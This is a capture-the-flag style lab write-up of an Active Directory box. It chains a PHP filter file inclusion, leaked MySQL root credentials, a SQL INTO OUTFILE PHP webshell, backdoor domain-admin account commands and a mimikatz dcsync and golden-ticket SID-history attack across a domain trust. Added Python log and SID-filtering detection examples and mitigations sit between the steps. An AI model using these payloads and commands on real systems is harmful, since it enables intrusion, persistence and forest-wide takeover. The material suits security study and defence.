## Enum
- trusteddc
  - domain: `trusted.vl`
  - smb
    - anon user? -> yes
    - shares? -> denied
  - ldap
    - anon bind? -> no
- labdc
  - domain: `lab.trusted.vl`
  - 80 - apache http
  - 3306 - mysql
  - smb
    - anon user? -> yes
    - shares? -> denied
  - anon bind? -> no
## `LABDC` - Webservice 80
- [[WAPP Directory Fuzzing]] reveals
  - `/dev` which hosts an additional site
  - `db.php` - interesting
The site URL looks like it may have a file inclusion: http://10.10.158.102/dev/index.html?view=contact.html
http://10.10.158.102/dev/index.html?view=db.php reveals: connected successfully.
I'm guessing that we may be able to use some sort of `.php` filter here to read some credentials....
### Source/Credential Disclosure
Visiting: http://10.10.158.102/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
Decoding the resulting base64 output string gives the following source code:
```php
<?php
$servername = "localhost";
$username = "root";
$password = "SuperSecureMySQLPassw0rd1337.";
$conn = mysqli_connect($servername, $username, $password);
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
```
## [[MYSQL]]
```sh
mycli -u root -h $LABDC --password SuperSecureMySQLPassw0rd1337.
```
Some database enumeration reveals a table containing users and passwords:
```
MariaDB
[email protected]:news> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+----------------------------------+
| 1 | Robert | rsmith | Smith | 7e7abb54bbef42f0fbfa3007b368def7 |
| 2 | Eric | ewalters | Walters | d6e81aeb4df9325b502a02f11043e0ad |
| 3 | Christine | cpowers | Powers | e3d3eb0f46fe5d75eed8d11d54045a60 |
+----+------------+--------------+-----------+----------------------------------+
```
A quick password spray with the raw values fails, indicating that we're dealing with password hashes rather than plaintext.
They look like unsalted MD5 hashes; one of them cracks:
```
IHateEric2
```
Another spray -> hit for `rsmith:IHateEric2` on `LABDC`
## `rsmith`
- SMB
  - shares?
    - `NETLOGON` -> empty
- winrm? -> nada
- ldap -> sure
  - users -> none new
- as-rep-roast?
- bloodhound -> no love, doesn't execute?
## Database Write
```
MariaDB
[email protected]:news> show grants for current_user();
+--------------------------------------------------------------------------------------------------------------------------------+
| Grants for root@% |
+--------------------------------------------------------------------------------------------------------------------------------+
| GRANT ALL PRIVILEGES ON *.* TO `root`@`%` IDENTIFIED BY PASSWORD '*665C8B0E1F0044B6A95EF22E82B93B3350F38A01' WITH GRANT OPTION |
+--------------------------------------------------------------------------------------------------------------------------------+
```
`ALL PRIVILEGES ON *.*` includes `FILE`, which means we can write files on the database host.
Like a webshell:
```sql
SELECT '<?php if (isset($_GET[\'cmd\'])) { echo \"<pre>\" . shell_exec($_GET[\'cmd\']) . \"</pre>\"; } ?>' INTO OUTFILE '/xampp/htdocs/hax.php'; -- windows xampp
```
Gets us a shell as `NT AUTHORITY\SYSTEM`.
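Defender's view of the two steps above (the `php://filter` inclusion via `view=` and the `INTO OUTFILE` write into the XAMPP webroot): an added detection example, not part of the original notes, that runs over constructed Apache access-log and MySQL general-log lines and flags stream wrappers / traversal in query parameters, shell-style parameter names, and file exports landing in a web-served directory. Log formats, paths and IPs are assumptions for the sample.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample Apache access-log lines (not taken from the original notes).
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /dev/index.html?view=contact.html HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=db.php HTTP/1.1" 200 431
10.0.0.9 - - [01/Jan/2024:10:00:20 +0000] "GET /dev/index.html?view=..%2F..%2Fxampp%2Fmysql%2Fbin%2Fmy.ini HTTP/1.1" 200 2200
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /hax.php?cmd=whoami HTTP/1.1" 200 77
"""

# Constructed sample MySQL general-log lines (time, thread id, command, argument).
MYSQL_GENERAL_LOG = """\
2024-01-01T10:00:40.000000Z 12 Query select * from users
2024-01-01T10:00:55.000000Z 12 Query SELECT '<?php ... ?>' INTO OUTFILE '/xampp/htdocs/hax.php'
2024-01-01T10:00:58.000000Z 12 Query SELECT id INTO OUTFILE '/tmp/export.csv' FROM users
"""

# Assumed web-served directories for this host (XAMPP on Windows, plus a common Linux one).
WEBROOTS = ("/xampp/htdocs", "/var/www")
STREAM_WRAPPERS = re.compile(r"^(php|data|expect|phar|file|zip|glob)://", re.I)
SUSPECT_PARAMS = {"cmd", "exec", "command", "system"}
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
OUTFILE_RE = re.compile(r"INTO\s+(OUTFILE|DUMPFILE)\s+'([^']+)'", re.I)


def classify_request(line):
    """Return a list of finding strings for one access-log line (empty if benign)."""
    m = REQ_RE.search(line)
    if not m:
        return []
    findings = []
    params = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
    for name, values in params.items():
        if name.lower() in SUSPECT_PARAMS:
            findings.append(f"shell-style parameter name: {name}")
        for raw in values:
            value = unquote(raw)  # parse_qs already decoded once; catch double-encoding
            if STREAM_WRAPPERS.match(value):
                findings.append(f"stream wrapper in {name}: {value}")
            if "../" in value or "..\\" in value:
                findings.append(f"path traversal in {name}: {value}")
    return findings


def classify_mysql_query(line):
    """Return a finding string if the logged query exports a file, else None."""
    m = OUTFILE_RE.search(line)
    if not m:
        return None
    path = m.group(2).replace("\\", "/").lower()
    if any(root in path for root in WEBROOTS) or path.endswith((".php", ".jsp", ".aspx")):
        return f"file write into web-served location: {path}"
    return f"file write via {m.group(1).upper()}: {path}"


def scan(access_log, mysql_log):
    """Run both classifiers and return (source, finding) tuples."""
    alerts = []
    for line in access_log.splitlines():
        alerts.extend(("http", f) for f in classify_request(line))
    for line in mysql_log.splitlines():
        finding = classify_mysql_query(line)
        if finding:
            alerts.append(("mysql", finding))
    return alerts


if __name__ == "__main__":
    for source, finding in scan(ACCESS_LOG, MYSQL_GENERAL_LOG):
        print(f"[{source}] {finding}")
```

The mitigations the alerts point at: resolve `view=` against an allowlist of page names instead of passing it to `include`, and on the database side set `secure_file_priv` to `NULL` (disables `INTO OUTFILE` entirely) or to a directory outside the webroot, and don't hand a web application a `root@%` account with `ALL PRIVILEGES ON *.*`.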
We could now go ahead and [[Windows Backdoor Admin Account]]
```
# payload
net user hacker password123! /add /domain && net localgroup Administrators hacker /add
http://10.10.205.150/hax.php?cmd=net%20user%20hacker%20password123!%20/add%20/domain%20&&%20net%20localgroup%20Administrators%20hacker%20/add
net group "Domain Admins" hacker /add /domain
http://10.10.205.150/hax.php?cmd=net%20group%20%22Domain%20Admins%22%20hacker%20/add%20/domain
```
We can now `winrm` as `hacker` with #AD/group/Domain-Admin rights:
```sh
evil-winrm -i $LABDC -u 'hacker' -p 'password123!'
```
## Domain Trust Pivot - Forging a [[Golden Ticket - TODO]]
Given that we're domain admins, we can forge a golden ticket in the following manner:
1. Dump LSA and extract the `krbtgt` hash
2. Query for the Domain SID
3. Forge the Golden Ticket
Extracting the `krbtgt` hash:
```
.\mimikatz "lsadump::dcsync /domain:lab.trusted.vl /all" "exit"
...
c7a03c565c68c6fac5f8913fab576ebd
```
Next we'll query for the domain SID:
```
.\mimikatz.exe "lsadump::trust /patch" "exit"
...
# LAB.trusted.vl
S-1-5-21-2241985869-2159962460-1278545866
# trusted.vl
S-1-5-21-3576695518-347000760-3731839591
```
And finally we'll go ahead and forge the golden ticket:
```
.\mimikatz.exe "kerberos::golden /user:Administrator /krbtgt:c7a03c565c68c6fac5f8913fab576ebd /domain:lab.trusted.vl /sid:S-1-5-21-2241985869-2159962460-1278545866 /sids:S-1-5-21-3576695518-347000760-3731839591-519" "exit"
```
**Note:** `-519` (the well-known Enterprise Admins RID) is appended to the `trusted.vl` domain SID so that the forged ticket's SID history carries #AD/group/Enterprise-Administrator membership in the parent domain.
Inject the forged ticket into the current session:
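Why the extra SID works here and what would stop it: the child-to-parent trust inside a forest does not apply SID filtering, so the parent's `-519` SID in the ticket's SID history is honoured. The added example below (not from the original notes or mimikatz) emulates the quarantine rule a filtered trust applies, keeping only SIDs whose domain part matches the trusted domain, and separately flags foreign SIDs carrying high-value RIDs, which is what a detection on the parent DC should alert on. The two domain SIDs are the ones recorded in the notes; the list of SIDs presented by the ticket is constructed.

```python
import re

# Domain SIDs as recorded in the notes.
LAB_SID = "S-1-5-21-2241985869-2159962460-1278545866"     # lab.trusted.vl (child)
PARENT_SID = "S-1-5-21-3576695518-347000760-3731839591"   # trusted.vl (parent)

# Constructed: what a forged child-domain ticket with the parent's EA SID in
# its SID history would present (user SID, a child-domain group, the ExtraSid).
FORGED_TICKET_SIDS = [LAB_SID + "-500", LAB_SID + "-512", PARENT_SID + "-519"]

SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}(?:-(?P<rid>\d+))?$")

# Well-known RIDs that should never arrive from another domain via SID history.
HIGH_VALUE_RIDS = {
    500: "Administrator",
    512: "Domain Admins",
    518: "Schema Admins",
    519: "Enterprise Admins",
}


def domain_of(sid):
    """Return the domain portion (S-1-5-21-x-y-z) of a domain SID, with or without RID."""
    m = SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain SID: {sid}")
    return sid.rsplit("-", 1)[0] if m.group("rid") is not None else sid


def rid_of(sid):
    """Return the RID as int, or None for a bare domain SID."""
    m = SID_RE.match(sid)
    return int(m.group("rid")) if m and m.group("rid") is not None else None


def filter_sids(trusted_domain_sid, presented_sids):
    """Emulate SID filtering (quarantine) on an inbound trust: only SIDs from the
    trusted domain itself survive; everything else is stripped from the PAC."""
    kept, stripped = [], []
    for sid in presented_sids:
        (kept if domain_of(sid) == trusted_domain_sid else stripped).append(sid)
    return kept, stripped


def privileged_foreign_sids(trusted_domain_sid, presented_sids):
    """Detection rule: foreign SIDs that carry a high-value RID. With filtering
    off (intra-forest default) these reach the parent domain and should alert."""
    hits = []
    for sid in presented_sids:
        rid = rid_of(sid)
        if domain_of(sid) != trusted_domain_sid and rid in HIGH_VALUE_RIDS:
            hits.append((sid, HIGH_VALUE_RIDS[rid]))
    return hits


if __name__ == "__main__":
    kept, stripped = filter_sids(LAB_SID, FORGED_TICKET_SIDS)
    print("kept after SID filtering:   ", kept)
    print("stripped by SID filtering:  ", stripped)
    for sid, group in privileged_foreign_sids(LAB_SID, FORGED_TICKET_SIDS):
        print(f"ALERT: foreign {group} SID presented across trust: {sid}")
```

With filtering applied the parent's `-519` SID is dropped and the ticket only grants what the child domain can legitimately grant; without it, the `privileged_foreign_sids` hit is the signal to watch for. Microsoft does not recommend quarantining intra-forest trusts, so in practice the defensive answer for this layout is treating the child DC as a tier-0 asset of the whole forest.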
```
.\mimikatz.exe "kerberos::ptt ticket.kirbi" "exit"
```
We can now go ahead and dump the `ntds.dit` file for the `trusted.vl` parent domain - yielding the NT Hash for `Administrator`:
```
.\mimikatz.exe "lsadump::dcsync /domain:trusted.vl /dc:trusted.vl /all" "exit"
```
Doesn't work for some reason, contacted the VL team....
- no response
- attempted to reset the entire lab and go again
```
mimikatz # lsadump::dcsync /domain:trusted.vl /dc:trusteddc.trusted.vl /all
[DC] 'trusted.vl' will be the domain
[DC] 'trusteddc.trusted.vl' will be the DC server
[DC] Exporting domain 'trusted.vl'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kull_m_rpc_drsr_getDCBind ; RPC Exception 0x00000005 (5)
```
- Remainder of the attack chain would be: dump hashes for the `trusted.vl` parent domain
- Leverage `Administrator` NT hash for access and capture `root.txt`
## Lessons Learned
- mysql file writes
- Domain Trusts
- [[Evil-WinRM]] quirk, no interactive sessions
- #tool/mimikatz drills
- re-download: https://github.com/antonioCoco/RunasCs